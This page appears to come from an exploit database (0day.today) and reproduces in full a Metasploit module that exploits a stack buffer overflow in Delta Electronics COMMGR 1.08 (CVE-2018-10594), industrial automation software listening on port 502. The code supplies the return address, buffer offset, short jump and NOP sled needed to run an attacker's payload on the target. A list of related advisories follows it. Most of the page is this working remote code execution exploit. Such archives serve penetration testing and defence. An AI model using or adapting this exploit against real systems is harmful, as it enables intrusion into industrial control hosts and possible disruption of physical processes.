Lucene search
Zdt1337DAY-ID-31281HistoryOct 09, 2018 - 12:00 a.m.
Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow Exploit
2018-10-0900:00:00
0day.today
67
0.623 Medium
EPSS
Percentile
97.9%
This Metasploit module exploits a stack based buffer overflow in Delta Electronics Delta Industrial Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially crafted packets. This Metasploit module has been tested successfully on Delta Electronics Delta Industrial Automation COMMGR 1.08 over Windows XP SP3, Windows 7 SP1, and Windows 8.1.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
crafted packets. This module has been tested successfully on Delta Electronics Delta
Industrial Automation COMMGR 1.08 over
Windows XP SP3,
Windows 7 SP1, and
Windows 8.1.
},
'Author' =>
[
't4rkd3vilz', # PoC
'hubertwslin' # Metasploit module
],
'References' =>
[
[ 'EDB', '44965'],
[ 'CVE', '2018-10594']
],
'Payload' =>
{
'Space' => 640,
'DisableNops' => true,
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Targets' =>
[
[ 'COMMGR 1.08 / Windows Universal',
{
'Ret' => 0x00401e14, # p/p/r COMMGR.exe
'Offset' => 4164
}
],
],
'DisclosureDate' => 'Jul 02 2018',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(502)
])
end
def exploit
data = rand_text_alpha(target['Offset'])
data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled
data << [target.ret].pack("V")
data << make_nops(40)
data << payload.encoded
print_status("Trying target #{target.name}, sending #{data.length} bytes...")
connect
sock.put(data)
disconnect
end
end
Related
exploitpack
exploitpack
Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)
2018-07-02 00:00:00
cvelist
cvelist
CVE-2018-10594
2018-06-21 00:00:00
zdt
zdt
Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow Exploit
2018-07-03 00:00:00
packetstorm
packetstorm
Delta Industrial Automation COMMGR 1.08 Buffer Overflow
2018-07-02 00:00:00
Delta Electronics Delta Industrial Automation COMMGR 1.08 Buffer Overflow
2018-10-10 00:00:00
ics
ics
Delta Electronics Delta Industrial Automation COMMGR
2018-06-21 12:00:00
cve
cve
CVE-2018-10594
2018-06-26 20:29:00
zdi
zdi
prion
prion
Stack overflow
2018-06-26 20:29:00
checkpoint_advisories
checkpoint_advisories
nvd
nvd
CVE-2018-10594
2018-06-26 20:29:00
exploitdb
exploitdb
Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)
2018-07-02 00:00:00